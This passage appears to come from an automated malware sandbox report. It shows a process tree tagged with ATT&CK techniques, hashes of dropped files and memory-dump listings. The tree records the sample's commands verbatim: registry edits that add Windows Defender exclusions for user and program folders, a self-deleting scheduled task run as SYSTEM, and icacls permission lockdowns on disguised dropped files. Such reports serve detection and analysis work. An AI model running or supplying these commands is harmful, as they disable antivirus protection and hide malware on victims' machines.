                                      "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"%USERPROFILE%\Documents\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F
                                      3⤵
                                      • Indicator Removal: Clear Persistence
                                      • Suspicious use of WriteProcessMemory
                                      PID:3836
                                      • C:\Windows\SysWOW64\schtasks.exe
                                        SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Users\Admin\Documents\" /t REG_DWORD /d 0 /f"
                                        4⤵
                                        • System Location Discovery: System Language Discovery
                                        • Scheduled Task/Job: Scheduled Task
                                        PID:1000
                                      • C:\Windows\SysWOW64\schtasks.exe
                                        SCHTASKS /Run /TN "Task1"
                                        4⤵
                                        • System Location Discovery: System Language Discovery
                                        PID:1944
                                      • C:\Windows\SysWOW64\schtasks.exe
                                        SCHTASKS /Delete /TN "Task1" /F
                                        4⤵
                                          PID:1952
                                      • C:\Windows\SysWOW64\cmd.exe
                                        cmd.exe /c icacls "C:\Program Files (x86)\bMy1um\image.png" /inheritance:r
                                        3⤵
                                        • Executes a command shell one-liner
                                        PID:2468
                                        • C:\Windows\SysWOW64\icacls.exe
                                          icacls "C:\Program Files (x86)\bMy1um\image.png" /inheritance:r
                                          4⤵
                                          • Possible privilege escalation attempt
                                          • Modifies file permissions
                                          • System Location Discovery: System Language Discovery
                                          PID:3076
                                      • C:\Windows\SysWOW64\cmd.exe
                                        cmd.exe /c icacls "C:\Program Files (x86)\bMy1um\image.png" /grant:r Administrators:(OI)(CI)F /grant:r SYSTEM:(OI)(CI)F
                                        3⤵
                                        • Executes a command shell one-liner
                                        • System Location Discovery: System Language Discovery
                                        PID:4460
                                        • C:\Windows\SysWOW64\icacls.exe
                                          icacls "C:\Program Files (x86)\bMy1um\image.png" /grant:r Administrators:(OI)(CI)F /grant:r SYSTEM:(OI)(CI)F
                                          4⤵
                                          • Possible privilege escalation attempt
                                          • Modifies file permissions
                                          • System Location Discovery: System Language Discovery
                                          PID:1608
                                      • C:\Windows\SysWOW64\cmd.exe
                                        cmd.exe /c icacls "C:\Program Files (x86)\bMy1um\image.png" /grant:r Users:(RX) /deny Users:(DE)
                                        3⤵
                                        • Executes a command shell one-liner
                                        • System Location Discovery: System Language Discovery
                                        PID:612
                                        • C:\Windows\SysWOW64\icacls.exe
                                          icacls "C:\Program Files (x86)\bMy1um\image.png" /grant:r Users:(RX) /deny Users:(DE)
                                          4⤵
                                          • Possible privilege escalation attempt
                                          • Modifies file permissions
                                          • System Location Discovery: System Language Discovery
                                          PID:372
                                      • C:\Windows\SysWOW64\cmd.exe
                                        cmd.exe /c icacls "C:\Program Files (x86)\bMy1um\thumbs.db" /inheritance:r
                                        3⤵
                                        • Executes a command shell one-liner
                                        • System Location Discovery: System Language Discovery
                                        PID:2740
                                        • C:\Windows\SysWOW64\icacls.exe
                                          icacls "C:\Program Files (x86)\bMy1um\thumbs.db" /inheritance:r
                                          4⤵
                                          • Possible privilege escalation attempt
                                          • Modifies file permissions
                                          • System Location Discovery: System Language Discovery
                                          PID:4972
                                      • C:\Windows\SysWOW64\cmd.exe
                                        cmd.exe /c icacls "C:\Program Files (x86)\bMy1um\thumbs.db" /grant:r Administrators:(OI)(CI)F /grant:r SYSTEM:(OI)(CI)F
                                        3⤵
                                        • Executes a command shell one-liner
                                        • System Location Discovery: System Language Discovery
                                        PID:844
                                        • C:\Windows\SysWOW64\icacls.exe
                                          icacls "C:\Program Files (x86)\bMy1um\thumbs.db" /grant:r Administrators:(OI)(CI)F /grant:r SYSTEM:(OI)(CI)F
                                          4⤵
                                          • Possible privilege escalation attempt
                                          • Modifies file permissions
                                          PID:2432
                                      • C:\Windows\SysWOW64\cmd.exe
                                        cmd.exe /c icacls "C:\Program Files (x86)\bMy1um\thumbs.db" /grant:r Users:(RX) /deny Users:(DE)
                                        3⤵
                                        • Executes a command shell one-liner
                                        • System Location Discovery: System Language Discovery
                                        PID:1756
                                        • C:\Windows\SysWOW64\icacls.exe
                                          icacls "C:\Program Files (x86)\bMy1um\thumbs.db" /grant:r Users:(RX) /deny Users:(DE)
                                          4⤵
                                          • Possible privilege escalation attempt
                                          • Modifies file permissions
                                          • System Location Discovery: System Language Discovery
                                          PID:2956
                                      • C:\Windows\SysWOW64\cmd.exe
                                        cmd.exe /c icacls "C:\Program Files (x86)\bMy1um\XPSPLOG.dll" /inheritance:r
                                        3⤵
                                        • Executes a command shell one-liner
                                        PID:960
                                        • C:\Windows\SysWOW64\icacls.exe
                                          icacls "C:\Program Files (x86)\bMy1um\XPSPLOG.dll" /inheritance:r
                                          4⤵
                                          • Possible privilege escalation attempt
                                          • Modifies file permissions
                                          PID:3032
                                      • C:\Windows\SysWOW64\cmd.exe
                                        cmd.exe /c icacls "C:\Program Files (x86)\bMy1um\XPSPLOG.dll" /grant:r Administrators:(OI)(CI)F /grant:r SYSTEM:(OI)(CI)F
                                        3⤵
                                        • Executes a command shell one-liner
                                        • System Location Discovery: System Language Discovery
                                        PID:2016
                                        • C:\Windows\SysWOW64\icacls.exe
                                          icacls "C:\Program Files (x86)\bMy1um\XPSPLOG.dll" /grant:r Administrators:(OI)(CI)F /grant:r SYSTEM:(OI)(CI)F
                                          4⤵
                                          • Possible privilege escalation attempt
                                          • Modifies file permissions
                                          • System Location Discovery: System Language Discovery
                                          PID:2312
                                      • C:\Windows\SysWOW64\cmd.exe
                                        cmd.exe /c icacls "C:\Program Files (x86)\bMy1um\XPSPLOG.dll" /grant:r Users:(RX) /deny Users:(DE)
                                        3⤵
                                        • Executes a command shell one-liner
                                        PID:3376
                                        • C:\Windows\SysWOW64\icacls.exe
                                          icacls "C:\Program Files (x86)\bMy1um\XPSPLOG.dll" /grant:r Users:(RX) /deny Users:(DE)
                                          4⤵
                                          • Possible privilege escalation attempt
                                          • Modifies file permissions
                                          • System Location Discovery: System Language Discovery
                                          PID:1312
                                  • C:\Windows\system32\cmd.exe
                                    cmd.exe /c reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\ProgramData" /t REG_DWORD /d 0 /f
                                    1⤵
                                    • Executes a command shell one-liner
                                    • Suspicious use of WriteProcessMemory
                                    PID:1616
                                    • C:\Windows\system32\reg.exe
                                      reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\ProgramData" /t REG_DWORD /d 0 /f
                                      2⤵
                                      • Windows security bypass
                                      PID:1088
                                  • C:\Windows\system32\cmd.exe
                                    cmd.exe
                                    1⤵
                                      PID:724
                                    • C:\Windows\system32\cmd.exe
                                      cmd.exe /c reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Users" /t REG_DWORD /d 0 /f
                                      1⤵
                                      • Executes a command shell one-liner
                                      • Suspicious use of WriteProcessMemory
                                      PID:4988
                                      • C:\Windows\system32\reg.exe
                                        reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Users" /t REG_DWORD /d 0 /f
                                        2⤵
                                        • Windows security bypass
                                        PID:3732
                                    • C:\Windows\system32\cmd.exe
                                      cmd.exe /c reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Program Files (x86)" /t REG_DWORD /d 0 /f
                                      1⤵
                                      • Executes a command shell one-liner
                                      • Suspicious use of WriteProcessMemory
                                      PID:3036
                                      • C:\Windows\system32\reg.exe
                                        reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Program Files (x86)" /t REG_DWORD /d 0 /f
                                        2⤵
                                        • Windows security bypass
                                        PID:4524
                                    • C:\Windows\system32\cmd.exe
                                      cmd.exe /c reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Users\Admin\Documents" /t REG_DWORD /d 0 /f
                                      1⤵
                                      • Executes a command shell one-liner
                                      • Suspicious use of WriteProcessMemory
                                      PID:4492
                                      • C:\Windows\system32\reg.exe
                                        reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Users\Admin\Documents" /t REG_DWORD /d 0 /f
                                        2⤵
                                        • Windows security bypass
                                        PID:4596
                                    • C:\Program Files (x86)\bMy1um\bMy1um.exe
                                      "C:\Program Files (x86)\bMy1um\bMy1um.exe"
                                      1⤵
                                      • Executes dropped EXE
                                      • Loads dropped DLL
                                      • System Location Discovery: System Language Discovery
                                      PID:4736
                                    • C:\Program Files (x86)\m5sYT3b\8lf6B2YXe.exe
                                      "C:\Program Files (x86)\m5sYT3b\8lf6B2YXe.exe"
                                      1⤵
                                      • Executes dropped EXE
                                      • Loads dropped DLL
                                      • System Location Discovery: System Language Discovery
                                      PID:3184
                                    • C:\Windows\system32\cmd.exe
                                      cmd.exe /c reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Program Files (x86)\bMy1um" /t REG_DWORD /d 0 /f
                                      1⤵
                                      • Executes a command shell one-liner
                                      PID:4624
                                      • C:\Windows\system32\reg.exe
                                        reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Program Files (x86)\bMy1um" /t REG_DWORD /d 0 /f
                                        2⤵
                                        • Windows security bypass
                                        PID:1844
                                    • C:\Program Files (x86)\bMy1um\bMy1um.exe
                                      "C:\Program Files (x86)\bMy1um\bMy1um.exe"
                                      1⤵
                                      • Executes dropped EXE
                                      • Loads dropped DLL
                                      • System Location Discovery: System Language Discovery
                                      PID:5096
                                    • C:\Windows\system32\cmd.exe
                                      cmd.exe /c reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Users" /t REG_DWORD /d 0 /f
                                      1⤵
                                      • Executes a command shell one-liner
                                      PID:3764
                                      • C:\Windows\system32\reg.exe
                                        reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Users" /t REG_DWORD /d 0 /f
                                        2⤵
                                        • Windows security bypass
                                        PID:1492
                                    • C:\Windows\system32\cmd.exe
                                      cmd.exe /c reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Users\Admin\Documents" /t REG_DWORD /d 0 /f
                                      1⤵
                                      • Executes a command shell one-liner
                                      PID:968
                                      • C:\Windows\system32\reg.exe
                                        reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Users\Admin\Documents" /t REG_DWORD /d 0 /f
                                        2⤵
                                        • Windows security bypass
                                        PID:3808

                                    Network

                                          MITRE ATT&CK Enterprise v16

                                          Replay Monitor

                                          Loading Replay Monitor...

                                          Downloads

                                          e58ac69.rbs

                                          • Path C:\Config.Msi\e58ac69.rbs
                                          • Size 7KB
                                          • SHA256 525eaa719f4c200611aa2f165d77d1bde78acd5510c805b35f3a8333ac6398b6
                                          • MD5 SHA1 SHA512 SSDEEP TLSH

                                          XPSPLOG.dll

                                          • Path C:\Program Files (x86)\bMy1um\XPSPLOG.dll
                                          • Size 4.6MB
                                          • SHA256 add273cad503d4b429f81bce318aac2e41c7d4ef11c15a44ce7abeb9e23799e4
                                          • MD5 SHA1 SHA512 SSDEEP TLSH

                                          bMy1um.exe

                                          • Path C:\Program Files (x86)\bMy1um\bMy1um.exe
                                          • Size 145KB
                                          • SHA256 6d6ba2bc9ad414837826f7278bc3e0116f1aeda02d0c2284ed65819f5d9180a8
                                          • MD5 SHA1 SHA512 SSDEEP TLSH

                                          image.png

                                          • Path C:\Program Files (x86)\bMy1um\image.png
                                          • Size 5.0MB
                                          • SHA256 4259ddfaac92d3d730a0194f48c440fab469108491053987bb5427b574b3d24b
                                          • MD5 SHA1 SHA512 SSDEEP TLSH

                                          thumbs.db

                                          • Path C:\Program Files (x86)\bMy1um\thumbs.db
                                          • Size 358KB
                                          • SHA256 13751e15d7bb47effdc3d2d8c5200c47a82ab90ee73323ddac7fef478cf2d00e
                                          • MD5 SHA1 SHA512 SSDEEP TLSH

                                          XPSPLOG.dll

                                          • Path C:\Program Files (x86)\m5sYT3b\XPSPLOG.dll
                                          • Size 4.6MB
                                          • SHA256 9357013f2f34beeada50b44d3206a87e0607a32a2f21fedebd26533312a80f79
                                          • MD5 SHA1 SHA512 SSDEEP TLSH

                                          image.png

                                          • Path C:\Program Files (x86)\m5sYT3b\image.png
                                          • Size 5.0MB
                                          • SHA256 4c15cd144b217225f72389ac0f20d13f70fa2d112ce8a447630a57bf8c5a6f72
                                          • MD5 SHA1 SHA512 SSDEEP TLSH

                                          __PSScriptPolicyTest_oh05tr2w.54a.ps1

                                          • Path C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_oh05tr2w.54a.ps1
                                          • Size 60B
                                          • SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
                                          • MD5 SHA1 SHA512 TLSH

                                          destopbak.ini

                                          • Path C:\Users\Public\Music\destopbak.ini
                                          • Size 2B
                                          • SHA256 dd1e2826c0124a6d4f7397a5a71f633928926c0608b62fb9e615ba778acc39ff
                                          • MD5 SHA1 SHA512

                                          UxEnhance64.dll

                                          • Path C:\Users\Public\kSgKwa\UxEnhance64.dll
                                          • Size 3.1MB
                                          • SHA256 cf576ce6a2de7d01963389384c45b5839699f52cfcf13f7112f547b7f5749a89
                                          • MD5 SHA1 SHA512 SSDEEP TLSH

                                          adoresd.dat

                                          • Path C:\Users\Public\kSgKwa\adoresd.dat
                                          • Size 4.7MB
                                          • SHA256 806484c5e1af5e99024c54f89e987d3321072e75f84835b2adba8e147707c428
                                          • MD5 SHA1 SHA512 SSDEEP TLSH

                                          msadox.tb

                                          • Path C:\Users\Public\kSgKwa\msadox.tb
                                          • Size 8KB
                                          • SHA256 c62b931ec0f714604d2370642c9f7092fb6ab49568a4f5d0f3ffcb49adfd15ec
                                          • MD5 SHA1 SHA512 SSDEEP TLSH

                                          sPEr0B.exe

                                          • Path C:\Users\Public\kSgKwa\sPEr0B.exe
                                          • Size 135KB
                                          • SHA256 676a2a7b94ca2f8ec76352ee656e4d075bb342bd7ad6efbc7c19c060001eace7
                                          • MD5 SHA1 SHA512 SSDEEP TLSH

                                          MSIAE4D.tmp

                                          • Path C:\Windows\Installer\MSIAE4D.tmp
                                          • Size 9.6MB
                                          • SHA256 86595c24fdf36ea2de40cad4c4deda645ae2cf746934cb5346995aedacedca38
                                          • MD5 SHA1 SHA512 SSDEEP TLSH

                                          e58ac68.msi

                                          • Path C:\Windows\Installer\e58ac68.msi
                                          • Size 9.6MB
                                          • SHA256 c50a0584fa6cf525593e7d094a4333f9d83388c2344f079a4282ff557e598a47
                                          • MD5 SHA1 SHA512 SSDEEP TLSH

                                          metadata-2

                                          • Path \??\GLOBALROOT\Device\HarddiskVolumeShadowCopy2\System Volume Information\SPP\metadata-2
                                          • Size 24.1MB
                                          • SHA256 b3ce1c55ddc187085ad7d3ea9d40305c90048a2e1365121a4b654bd1c924c665
                                          • MD5 SHA1 SHA512 SSDEEP TLSH

                                          {f462a5ce-dc9b-409d-8335-0eac23945f27}_OnDiskSnapshotProp

                                          • Path \??\Volume{4588d6e0-0000-0000-0000-d01200000000}\System Volume Information\SPP\OnlineMetadataCache\{f462a5ce-dc9b-409d-8335-0eac23945f27}_OnDiskSnapshotProp
                                          • Size 6KB
                                          • SHA256 fe001069713d760a75cf7322ecba78e9b0785d7d82b1e5f707c8e1276566f995
                                          • MD5 SHA1 SHA512 SSDEEP TLSH

                                          xxxx.ini

                                          • Path \??\c:\xxxx.ini
                                          • Size 2B
                                          • SHA256 7eb70257593da06f682a3ddda54a9d260d4fc514f645237f5ca74b08f8da61a6
                                          • MD5 SHA1 SHA512

                                          memory/372-284-0x00000000060E0000-0x0000000006112000-memory.dmp

                                          memory/372-298-0x00000000070E0000-0x0000000007176000-memory.dmp

                                          memory/372-294-0x0000000006D30000-0x0000000006DD3000-memory.dmp

                                          memory/372-285-0x000000006EE90000-0x000000006EEDC000-memory.dmp

                                          memory/372-296-0x0000000006E40000-0x0000000006E5A000-memory.dmp

                                          memory/372-283-0x0000000005B70000-0x0000000005BBC000-memory.dmp

                                          memory/372-282-0x0000000005B30000-0x0000000005B4E000-memory.dmp

                                          memory/372-281-0x0000000005520000-0x0000000005874000-memory.dmp

                                          memory/372-295-0x00000000074F0000-0x0000000007B6A000-memory.dmp

                                          memory/372-278-0x00000000054B0000-0x0000000005516000-memory.dmp

                                          memory/372-272-0x0000000005440000-0x00000000054A6000-memory.dmp

                                          memory/372-271-0x0000000005320000-0x0000000005342000-memory.dmp

                                          memory/372-297-0x0000000006EB0000-0x0000000006EBA000-memory.dmp

                                          memory/372-293-0x0000000006D10000-0x0000000006D2E000-memory.dmp

                                          memory/372-270-0x0000000004BF0000-0x0000000005218000-memory.dmp

                                          memory/372-269-0x0000000004560000-0x0000000004596000-memory.dmp

                                          memory/372-299-0x0000000007050000-0x0000000007061000-memory.dmp

                                          memory/3184-258-0x00000000036C0000-0x0000000003EC7000-memory.dmp

                                          memory/3184-256-0x0000000001340000-0x0000000001341000-memory.dmp

                                          memory/3184-260-0x0000000001320000-0x0000000001321000-memory.dmp

                                          memory/3184-248-0x00000000036C0000-0x0000000003EC7000-memory.dmp

                                          memory/3184-243-0x0000000001320000-0x0000000001321000-memory.dmp

                                          memory/3184-244-0x0000000072770000-0x0000000072EBA000-memory.dmp

                                          memory/3748-42-0x00007FFCDC280000-0x00007FFCDC290000-memory.dmp

                                          memory/3748-16-0x00007FFCDC280000-0x00007FFCDC290000-memory.dmp

                                          memory/3748-12-0x00007FFCEBF30000-0x00007FFCEBF32000-memory.dmp

                                          memory/3748-13-0x00007FFCCD620000-0x00007FFCCDC83000-memory.dmp

                                          memory/4200-71-0x000001D44D2D0000-0x000001D44DB61000-memory.dmp

                                          memory/4200-70-0x000001D44D2D0000-0x000001D44DB61000-memory.dmp

                                          memory/4200-90-0x000001D44D2D0000-0x000001D44DB61000-memory.dmp

                                          memory/4200-57-0x00007FFCCBD40000-0x00007FFCCC25E000-memory.dmp

                                          memory/4200-62-0x000001D44D2D0000-0x000001D44DB61000-memory.dmp

                                          memory/4200-56-0x00007FFCEBF30000-0x00007FFCEBF32000-memory.dmp

                                          memory/4200-65-0x000001D44D2D0000-0x000001D44DB61000-memory.dmp

                                          memory/4200-64-0x00007FFCEBF40000-0x00007FFCEBF42000-memory.dmp

                                          memory/4200-69-0x000001D44D2D0000-0x000001D44DB61000-memory.dmp

                                          memory/4200-91-0x000001D44D2D0000-0x000001D44DB61000-memory.dmp

                                          memory/4200-72-0x000001D44D2D0000-0x000001D44DB61000-memory.dmp

                                          memory/4200-76-0x000001D44D2D0000-0x000001D44DB61000-memory.dmp

                                          memory/4200-85-0x000001D44DF90000-0x000001D44E01A000-memory.dmp

                                          memory/4200-84-0x000001D44DF90000-0x000001D44E01A000-memory.dmp

                                          memory/4200-83-0x000001D44DF90000-0x000001D44E01A000-memory.dmp

                                          memory/4200-82-0x000001D44DF90000-0x000001D44E01A000-memory.dmp

                                          memory/4200-81-0x000001D44DEB0000-0x000001D44DEFE000-memory.dmp

                                          memory/4736-233-0x0000000074B90000-0x00000000752DA000-memory.dmp

                                          memory/4736-232-0x00000000017F0000-0x00000000017F1000-memory.dmp

                                          memory/4932-268-0x0000000003910000-0x0000000004117000-memory.dmp

                                          memory/4932-201-0x0000000010000000-0x0000000010061000-memory.dmp

                                          memory/4932-175-0x0000000074B90000-0x00000000752DA000-memory.dmp

                                          memory/4932-179-0x0000000003910000-0x0000000004117000-memory.dmp

                                          memory/4932-181-0x0000000001370000-0x0000000001371000-memory.dmp

                                          memory/4932-227-0x0000000003910000-0x0000000004117000-memory.dmp

                                          memory/4932-213-0x0000000003910000-0x0000000004117000-memory.dmp

                                          memory/4932-212-0x0000000001620000-0x0000000001634000-memory.dmp

                                          memory/4932-182-0x0000000003910000-0x0000000004117000-memory.dmp

                                          memory/4932-186-0x0000000003910000-0x0000000004117000-memory.dmp

                                          memory/4932-174-0x0000000001350000-0x0000000001351000-memory.dmp

                                          memory/5096-250-0x0000000000990000-0x0000000000991000-memory.dmp

                                          memory/5096-251-0x0000000074B90000-0x00000000752DA000-memory.dmp

                                          memory/5096-254-0x0000000003200000-0x0000000003A07000-memory.dmp

                                          memory/5096-262-0x0000000003200000-0x0000000003A07000-memory.dmp

                                          memory/5096-265-0x0000000000990000-0x0000000000991000-memory.dmp

                                          memory/5096-261-0x00000000009B0000-0x00000000009B1000-memory.dmp